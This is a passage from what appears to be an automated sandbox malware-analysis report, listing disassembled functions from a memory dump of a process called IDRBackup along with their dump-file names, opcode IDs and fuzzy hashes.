                                                                                                  • Instruction Fuzzy Hash: 7E51FBA140D3C21EE70F9B389A7A822BF6D9F0751431E55DFD581AF4B3D2906802DB36
                                                                                                  Function 5000F37C Relevance: .1, Instructions: 135COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 34addfdfd44d2b5a7ee3eb067485da2a0c1ac97cbb83e561f29096e57ed5b4eb
                                                                                                  • Instruction ID: 96fe11994be0b75f9563daf82432513874e9be437c2a1f26291a1d4f2f607fca
                                                                                                  • Opcode Fuzzy Hash: 34addfdfd44d2b5a7ee3eb067485da2a0c1ac97cbb83e561f29096e57ed5b4eb
                                                                                                  • Instruction Fuzzy Hash: B251936150C3C24ED70FDB788ABE516BF699F0B51430E59CFC486AF0B3D6906852DB62
                                                                                                  Function 5000DD8C Relevance: .1, Instructions: 135COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 79aaa6c0de2dc065a7b3b81e3823d87c4233978bbcbe77b1d553517de72bb336
                                                                                                  • Instruction ID: 0186ce17429e513dd024f2116ea5009f4af07db10d1ecc6184b1adb19083cce7
                                                                                                  • Opcode Fuzzy Hash: 79aaa6c0de2dc065a7b3b81e3823d87c4233978bbcbe77b1d553517de72bb336
                                                                                                  • Instruction Fuzzy Hash: 8751837150C3C28ED70F9F78D9BA525BF79AF0B61130A55CBC8869F0A3C7A06452DB22
                                                                                                  Function 5000F4CC Relevance: .1, Instructions: 133COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0433af7b600c67462db1beb39ad79faa7adac56697021000603bb5cf8c45bc76
                                                                                                  • Instruction ID: 2e9cc7c118d5684bc58e0753e3159db40eca44ffbd4b232cc05152bb2269d7a2
                                                                                                  • Opcode Fuzzy Hash: 0433af7b600c67462db1beb39ad79faa7adac56697021000603bb5cf8c45bc76
                                                                                                  • Instruction Fuzzy Hash: 7A51FCA140C3C15EE70F9B389A7A822BF6D9F0B51431E55DFD581AF4B3D2906812DB36
                                                                                                  Function 5000F384 Relevance: .1, Instructions: 131COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: eb2bf226f43f421fb2a42918cfea585ca1279c0e26961ebeefe3f18fd68a0469
                                                                                                  • Instruction ID: b0cf766b044fdeb08461907f15d5c85ddbed29b5ecf835b6a41b37f46dab4d83
                                                                                                  • Opcode Fuzzy Hash: eb2bf226f43f421fb2a42918cfea585ca1279c0e26961ebeefe3f18fd68a0469
                                                                                                  • Instruction Fuzzy Hash: FC51A46150C3C24ED70FDB788ABE516BF699F0B51430E59CFC486AF0B3D6906852DB62
                                                                                                  Function 5000DD94 Relevance: .1, Instructions: 131COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6dbf02b5eb8fb7eb52cc7bb35137d6e26b37df2db80cf6353b457e7effc8dd08
                                                                                                  • Instruction ID: 5ad55dd7ce5ca3c7212f47d891035b313c114e872d8ff3384c55cc43ddf9bd78
                                                                                                  • Opcode Fuzzy Hash: 6dbf02b5eb8fb7eb52cc7bb35137d6e26b37df2db80cf6353b457e7effc8dd08
                                                                                                  • Instruction Fuzzy Hash: DB51937150C3C28ED70F9F78C9BA525BF79AF0B61130A55CBC8869F0A3C7A06452DB22
                                                                                                  Function 5000F4D4 Relevance: .1, Instructions: 129COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 85a2d5a66bb4aa8700f994987f481b7c78fa599f6f9fb65f52af72537aa264ea
                                                                                                  • Instruction ID: 62a3478aba6f4a637f269b856829e269853efbc2686c112e28406519e55a5c6e
                                                                                                  • Opcode Fuzzy Hash: 85a2d5a66bb4aa8700f994987f481b7c78fa599f6f9fb65f52af72537aa264ea
                                                                                                  • Instruction Fuzzy Hash: 3041F9A140C3C15EE70F9B389ABA822BF6D9F0B51431E55DFD581AF4B3D2906812DB26
                                                                                                  Function 5000F38C Relevance: .1, Instructions: 127COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 232f98d8c0e135eafc84de5d646b48cd7ea02f24ba742cf4345c6c2cdaad44f2
                                                                                                  • Instruction ID: 3fc2cc2ff6e1a8461ab9fba211dac5ebc88479344d6b8d3670da24eca6de4668
                                                                                                  • Opcode Fuzzy Hash: 232f98d8c0e135eafc84de5d646b48cd7ea02f24ba742cf4345c6c2cdaad44f2
                                                                                                  • Instruction Fuzzy Hash: 8541B46150C3C24ED70FDB788ABA516BF699F0B51430E59CFC486AF0B3D6906852DB62
                                                                                                  Function 5000DD9C Relevance: .1, Instructions: 127COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a45190e09d9bf236810e4ff8266c93ef797d6677686cf211f3336a455a03fe95
                                                                                                  • Instruction ID: 0ef01a6513dc70f9e567cdd524f21d4da15701458fb2f4443698a613dc1f395d
                                                                                                  • Opcode Fuzzy Hash: a45190e09d9bf236810e4ff8266c93ef797d6677686cf211f3336a455a03fe95
                                                                                                  • Instruction Fuzzy Hash: 3441947150C3C28ED70F9F78C9BA525BF799F0B61170A55DBC8869F0A3C7A06452DB22
                                                                                                  Function 5000F4DC Relevance: .1, Instructions: 125COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 64e4de89f26db7d15624a623295065e809851b163e311952cc282a26242bef1b
                                                                                                  • Instruction ID: 0cdebaf52018e39d301011330c67596e957d6c034db2cae8bb07529f92304067
                                                                                                  • Opcode Fuzzy Hash: 64e4de89f26db7d15624a623295065e809851b163e311952cc282a26242bef1b
                                                                                                  • Instruction Fuzzy Hash: 3341097140C3C15EE70F9B389ABA822BF6D9F0B51431E55DFD582AF0B3D2902812DB22
                                                                                                  Function 5000F394 Relevance: .1, Instructions: 123COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0eaaa241b57f6bc6181771671b55686257299d2fc79d139517029d2c1eb92ffe
                                                                                                  • Instruction ID: 799071888f44a204b264985ad53d5e038b3ad1f9471cc687eb681bc2de520f8c
                                                                                                  • Opcode Fuzzy Hash: 0eaaa241b57f6bc6181771671b55686257299d2fc79d139517029d2c1eb92ffe
                                                                                                  • Instruction Fuzzy Hash: AC41C46150C3C24ED70FDB788ABA512BF699F0B51430E59CFC486AF0B3D2906852DB62
                                                                                                  Function 5000DDA4 Relevance: .1, Instructions: 123COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f2739e082485819c3b4929c626a7cd21152edd68a8f7d43b954cb8737767b212
                                                                                                  • Instruction ID: a52ec24117d3ab1e218e1352be94492858e3319532a51e37110d135d307abffc
                                                                                                  • Opcode Fuzzy Hash: f2739e082485819c3b4929c626a7cd21152edd68a8f7d43b954cb8737767b212
                                                                                                  • Instruction Fuzzy Hash: 4541A37150C3C28ED70F9F78C9BA525BF799F0B61170A59DBC8869F0A3C7A06452DB22
                                                                                                  Function 5000F39C Relevance: .1, Instructions: 119COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b83d7f176e03407a54ccfd9feeecfa8ad5de2ef462d38d8f535d0ff4b593184f
                                                                                                  • Instruction ID: b506451c5a525a21d55edf40b1feeb30a3f4208dd948754419113baf5e356db2
                                                                                                  • Opcode Fuzzy Hash: b83d7f176e03407a54ccfd9feeecfa8ad5de2ef462d38d8f535d0ff4b593184f
                                                                                                  • Instruction Fuzzy Hash: 1941B46150C3C24ED70FDB788ABA512BF695F0B51470E55DBC486AF0B3D2906852DB62
                                                                                                  Function 5000DDAC Relevance: .1, Instructions: 119COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dd3460e2b8c3e69ef91e6cee421c7f808776796e869f078115faeded1848212f
                                                                                                  • Instruction ID: ff6314490a249f9d610b48da2f6e9bbf228d8d2e7f03a33634c924506a6540db
                                                                                                  • Opcode Fuzzy Hash: dd3460e2b8c3e69ef91e6cee421c7f808776796e869f078115faeded1848212f
                                                                                                  • Instruction Fuzzy Hash: 7C41B47150C3C28ED70F9F78C97A526BF799F0B61170A55DBC8869F0A3C7A06452DB22
                                                                                                  Function 5000F3A4 Relevance: .1, Instructions: 115COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2f8fb8cd2d7c2b81a64f89de5bd964935982901503c70eefd73c47a3bcadb099
                                                                                                  • Instruction ID: 3263b5f4857bf175e89eeb243d1c0a6d58a26a7efd25f3d794fe1456fdeb102a
                                                                                                  • Opcode Fuzzy Hash: 2f8fb8cd2d7c2b81a64f89de5bd964935982901503c70eefd73c47a3bcadb099
                                                                                                  • Instruction Fuzzy Hash: E641C26150C3C24ED70FDB788ABA512BF6A4F0B51470E59DFC4C6AF0B3D2906852DB62
                                                                                                  Function 5000DDB4 Relevance: .1, Instructions: 115COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 16eedda9ba77c2bc4e2384b23185aa3d1ec3959f62fcd8b9fe3d69b70e4bdbc6
                                                                                                  • Instruction ID: f7e4599e4e7867a802b3eb4e05e0015a082f56fcae96caea9ca7a8766ee51d12
                                                                                                  • Opcode Fuzzy Hash: 16eedda9ba77c2bc4e2384b23185aa3d1ec3959f62fcd8b9fe3d69b70e4bdbc6
                                                                                                  • Instruction Fuzzy Hash: 4C41C47150C3C28ED70F9B78C97A526BF799F0B61170B55DBC8869F0A3C7A06452DB22
                                                                                                  Function 5000F3AC Relevance: .1, Instructions: 111COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
